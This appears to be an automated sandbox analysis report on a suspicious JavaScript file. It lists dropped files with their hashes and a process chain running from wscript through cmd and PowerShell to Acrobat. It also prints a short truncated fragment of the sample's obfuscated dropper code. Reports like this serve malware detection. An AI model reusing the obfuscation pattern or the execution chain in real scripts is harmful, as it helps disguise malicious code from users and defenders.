Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.322105669667897 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJfzdPeUkwRe9:YvXKXBTsXJIRsdTeOGsGb8Ukee9 |
MD5: | 15AFC0E26B9698DC6D6EAD0FE4CF11A7 |
SHA1: | B0A7C3899A5088CC3262D0AF5478426DF73CD595 |
SHA-256: | 12597D52F2B047590BD8E86F855001AEF86F3E38DDE8081BFFD2044DC01FB8C6 |
SHA-512: | 3261FDAEFD716748CC19EEF353DC2FB497F9EB1446276047359B9AD38D2739693F584397FE765930C8E138A2FD58281F42C9AB3C9A7506E222FF1136CD198566 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.302200317748374 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJfYdPeUkwRe9:YvXKXBTsXJIRsdTeOGsGg8Ukee9 |
MD5: | 3DA2E8C03AEEA311BB4A7BED1A559262 |
SHA1: | 5352614A565E36461C2F5266F217C1DF2EE4E81D |
SHA-256: | F0809B675546182EE2D4E3B34AF2F4B168DA71BEB1D8BADDCD54EC0AB0445701 |
SHA-512: | D4AD4D8F4B80A674A5F5EC4299AC0B1896A2592E7E54CA44DB165EA33B6BD0B7452233295E7D848557F0DB4F9207885B54E82C92E608E29E2ADD1AB2ED684EDD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.288289428559775 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJf+dPeUkwRe9:YvXKXBTsXJIRsdTeOGsG28Ukee9 |
MD5: | CE3734562DB570335B142554E157E7B4 |
SHA1: | 978B72D7DE86BEB72034CBFF6CB3CCCFEA9E6CD1 |
SHA-256: | B72AD4A1AFAE9C0C1881CAAD6556823F79ED6E788ABA6B12EE159E7DA6A4B875 |
SHA-512: | 52BFADF2F7F26820C3FFA8BE687E4AF209BD7D28F045CC77BF001D27D3B7A6C6969E90761DA3F8F3BEADADEA8B0E15D7D27E4F27E72F3B88F9AFB2B9C4996ADA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.285732292963486 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJfbPtdPeUkwRe9:YvXKXBTsXJIRsdTeOGsGDV8Ukee9 |
MD5: | 601FA87075D795C5719E4F3197D14A88 |
SHA1: | DF2ED56C8ADAAB2D153BF6BAD1317FD695325F0E |
SHA-256: | 1A0CFE3F3312118F2BB961FB18B6BD47BEFBBEEE6E31C6C44CC1546DC65A17CD |
SHA-512: | 16354F8687A89BBFF0DCE2783683EA5FEF1F31759A80A44359341A6FE8C1EA9A99959E9BF8D05AAD663EF28CFC17F12E75A61EAE56C6A7B217C255D7086B4E90 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.289764451192827 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJf21rPeUkwRe9:YvXKXBTsXJIRsdTeOGsG+16Ukee9 |
MD5: | 9C465CAE427759BB91AEA90FE1C0B448 |
SHA1: | 4FCC117F242DCD2EE13A34A4D616101BD33023FD |
SHA-256: | 464460F7AAF9EABCFDF2B6F31B5535611C55CE472378742CD07289510D4395FD |
SHA-512: | 764C964C68561E4BE79766082E43243A7976B22FB9A83E06C6E32307BB39C947E39CC6F0B35F668BEDCF61FA13760540B5EF98B109F5431C08A6518F16CB84AC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.666299127454047 |
Encrypted: | false |
SSDEEP: | 24:Yv6XB0JIRmeOyamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSk/:YvE0GsepBgkDMUJUAh8cvMk/ |
MD5: | 4A2D6D6438F50D61FA769C5B5C2AB8A6 |
SHA1: | 4BDE2600F1AC3BD8AB7DB755E8A6FEEBA5C3F7D8 |
SHA-256: | 4819F1D35511DDB14D46F1069DEECEEF8488209C145E6D8CB8FF1F1CC1CEEDDB |
SHA-512: | 42997124A8EEF0A5D2271B0FE7002B09CFB1747F1C1496CE0DF5287314771B20289DB8483D7ACE11653E458AAA042E18F94175DAD8648B01936F465401E5E69B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.268056681038459 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJfshHHrPeUkwRe9:YvXKXBTsXJIRsdTeOGsGUUUkee9 |
MD5: | 7C2671CF5E72F4D786F112354B763DC7 |
SHA1: | E318FEA62996439322AD4EB6EE9CAE02A05F3485 |
SHA-256: | 3A0329677A0A9F8BCBE4D7335A9E69AF6E4E6EFC1E7F20F552F1DBDE04FEE5E1 |
SHA-512: | 4514278E059C3E5586C7A74F227DB93C43AE3CBDE74F0CA156F602ECE2A9233CEB1F526D756274365C9CEFFBB3AE445E20CB18F4E9E8A3506FA8CBE77B5C76FB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.277707848940679 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJTqgFCrPeUkwRe9:YvXKXBTsXJIRsdTeOGsGTq16Ukee9 |
MD5: | 6C590DD4F251C6C9F03DA790869BAE8D |
SHA1: | 8E82231B38774BB7F0F6CB948FA26ABB757DC38F |
SHA-256: | 72749FFE0B89218864D357841B1E7244C1DBCD5C49C6FA1C77B157E1566A6F07 |
SHA-512: | 67A5F10F1520C8EEBDE992063138B631EC399EB807A575DC91E9C9C6452B941CFF822E00069AE878D1F49F955003AB7A45E43DAEBA9297281BB32D0B8A4E75DE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.138790489569208 |
Encrypted: | false |
SSDEEP: | 48:YlgCqw1n5pI8gUHBQ7FtLnt0xK7vyPqlIEPV6aACqnjdLd97Zvy:6q0nHI8gUHBQ73Lnt0xK7vySdt5bqnji |
MD5: | 411367715A11B3D6CD3055B1FACC463F |
SHA1: | BEEFF11CA15C314E14FC77D3435FD0E017F92130 |
SHA-256: | AE6AFF67F1BCE826BB954D4724161F0B558A97C3FFBFB627F9054817EAA66C88 |
SHA-512: | B206C18537A45834E695BC63FE924B50C8B6B134B6A68B482189099CBB9F027957FEE3D895F2274B1BA3C7E6BB3B64F9C866F14B0324448A1B09E08E2E487BB9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.452411866781204 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsuwlwi:lNVmsw3SHtbDbPe0K3+fDZdHZi |
MD5: | FB0898723816DF0BCA3D6181624B79FD |
SHA1: | 0B864A010A9B9087E31438C29280DC99F61237B3 |
SHA-256: | DAFAB3488705E3751F54D0378553E34906980224F3E0BD7FCDD8DC6F135BAD64 |
SHA-512: | A464E9D78B327CD40595D916B4B4E55589547370BEEE0F21E1FD08064A3BE263B7D531DDD9930475194EA8D8384C54EC79125CCDD900A5D668A033A17DACEC02 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.9575881216872837 |
Encrypted: | false |
SSDEEP: | 48:7MvrvrBd6dHtbGIbPe0K3+fDy2dsulAqFl2GL7msN:7C3SHtbDbPe0K3+fDZdH+KVmsN |
MD5: | D72A0D5B125A0FDFCA29FDA83FFCD380 |
SHA1: | 50F3E875038C0BA931852CEFCE37E92128D1C3A9 |
SHA-256: | CF907EAE8CFB64875EC360078719AE949EF34F1BC2A259ABD53436AD822EC5AB |
SHA-512: | 8B9EF4550E3A8F98DEDBD1C3E5AB63A2BEF00B27B4ABF72507F2351C56138B88755C3241A69679FEEA3764D27AAC3F8007DF1C93FFF478C83F4BF8EA29612626 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgNUaQkcTVD3gQk6/HGad8T7g1zmYyu:6a6TZ44ADENU7kchzPk2L1SK |
MD5: | E67329FA592946B9A6B86EAB477B18A1 |
SHA1: | FBEC70EC5664B895FBE0F69D9C1DBA409E3694CC |
SHA-256: | 7F92B787DD3B1E08FF743F45B4ECE05AFFE07736A23758566B632EF7561B4717 |
SHA-512: | 6ECE4274537B7A845757AD843F90F2C8F6C3D09B895E5CDDA1F361577233618BFDF66F8514F1DF1F2217B5AB6E9D6E9EF2EBF2EC20C250CA332F4465A266D244 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllulbnolz:NllUc |
MD5: | F23953D4A58E404FCB67ADD0C45EB27A |
SHA1: | 2D75B5CACF2916C66E440F19F6B3B21DFD289340 |
SHA-256: | 16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B |
SHA-512: | B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.472955316099031 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClXH:Qw946cPbiOxDlbYnuRK+bgH |
MD5: | F2B02E46BFD272EB61B72EC00BBCB98E |
SHA1: | 88DC96C1C07A91D59811AF587C3CB0E10281DBAF |
SHA-256: | 41586C578DC5CC2C229D521801223FB164A8F120EDEE62609FEEAC6A48C4F926 |
SHA-512: | FEB912B541CD8617EC2BC28AB5485C1CC94426730F949091353F8F496D77B69437430DC08C340F12FB2423D8FDA6B133CED0371037ED95BDE85D720239E289D7 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 20-11-15-958.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.386483451061953 |
Encrypted: | false |
SSDEEP: | 384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID |
MD5: | F49CA270724D610D1589E217EA78D6D1 |
SHA1: | 22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3 |
SHA-256: | D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D |
SHA-512: | 181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.331241105237517 |
Encrypted: | false |
SSDEEP: | 384:2aOjOe3Q6UbDfmEcRweZ4SxMsnkoHnb94jqMO6sYMhhUuUmAwPLHqlqLC/1m0v//:zu+ |
MD5: | 84D922E2516AF5354250C4841CEB3E6B |
SHA1: | 5212390D09C65906A1F4A7CEEE9CCA3E7CF1FEB0 |
SHA-256: | 20956B8C9B916A07EDE37D9C6CBE25BB251C7E97828F4B9316AE0F73CE6B78F4 |
SHA-512: | A41812A5D0E09DC307675FE8D92EF3D7B5447E01C33F20EE562A0A4549115A64F6A8673D0616DD1564FFF8F24CB2A4CE7DFAE38AF51C604D7D24E073B785006D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 35721 |
Entropy (8bit): | 5.411346713843412 |
Encrypted: | false |
SSDEEP: | 768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRBN:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRN |
MD5: | FD08C6187F06BAEE968089698F8D0EF6 |
SHA1: | 99900B2B9308958700E9C52D573A3EC2A51198C1 |
SHA-256: | 9E566694D75DDD164F0F85282C2ECD036B68D9DEA5F6BC3494D7CD74170694B0 |
SHA-512: | 9FD34F19652D7FFB2E18BC68B823C46F705A53D456F56E7B2AACC820C9C08210C7434E1E7E16EEF2848184523192F2107A2C8C1440BFFCCE6F577F865564E062 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/VR9WL07oXGZnYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tR9WLxXGZnZGh3mlind9i4ufFXpAXkru |
MD5: | 9D85D4B75E446857CE3D750299B2AF1A |
SHA1: | 3CD9576D0A07B9E4454F4FF4DDF8D18EFBB764B4 |
SHA-256: | D3C44F50FD2912C92DAF009689B221515709E00C839A8DA425078C96F2D6053A |
SHA-512: | 1C63A091EF404FC446F1A789D33258FE9F6AD25C80375CADADF0829BC5DCD70A16A8E30E664D0A02F39E7A3D10B9E56AD7F9CA9D733A877726C1DD043B14842F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.912540210696273 |
TrID: | |
File name: | 2314572873239327086.js |
File size: | 21'420 bytes |
MD5: | 88e80fe375257f388c5d4f062ee82765 |
SHA1: | 2e60a1b6a4d46c7ad06a44e925e9c01d88c50882 |
SHA256: | a567b45eaeed64dccd8f5e770e1e876aa22b8eff22495368a236dc7b17e2aaea |
SHA512: | 7300db66794756b2268ccf4d75461da043036e1f958c1b0495d0843770280352887776ffafaa6564f07f7a734dd9755ed00e61d51bf6fbc6d1331ce4bf73ddcc |
SSDEEP: | 384:VHgoQKzO5p4HZ0pgvfI/L3kXffnJOphKb5+HcLD+:VHg94WgvbfYhKb5+8LD+ |
TLSH: | F8A23548D5035B1A8CE5DBD69BC700F136EE03FC9AE1119E2C03759C9588674EAEB2F9 |
File Content Preview: | function lghtraech(){ezcpmclfx=[1031,3079,5127,4103,2055,3072];var vcvzuekzd=this[prnmvy+fymqdhkwx+aaoxyui+rvvkwayph+hjatdli+qlploevl+tyowopzp+ygjoeis](this[fmebud+amiqtj+xlfszza+aaoxyui+umrzs+prnmvy+ygjoeis][ybcgub+aaoxyui+hjatdli+fymqdhkwx+ygjoeis+hjatd |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 1 |
Start time: | 20:11:05 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff772e80000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 20:11:06 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6cfb50000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 20:11:07 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 20:11:07 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 11 |
Start time: | 20:11:12 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff702560000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 12 |
Start time: | 20:11:12 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
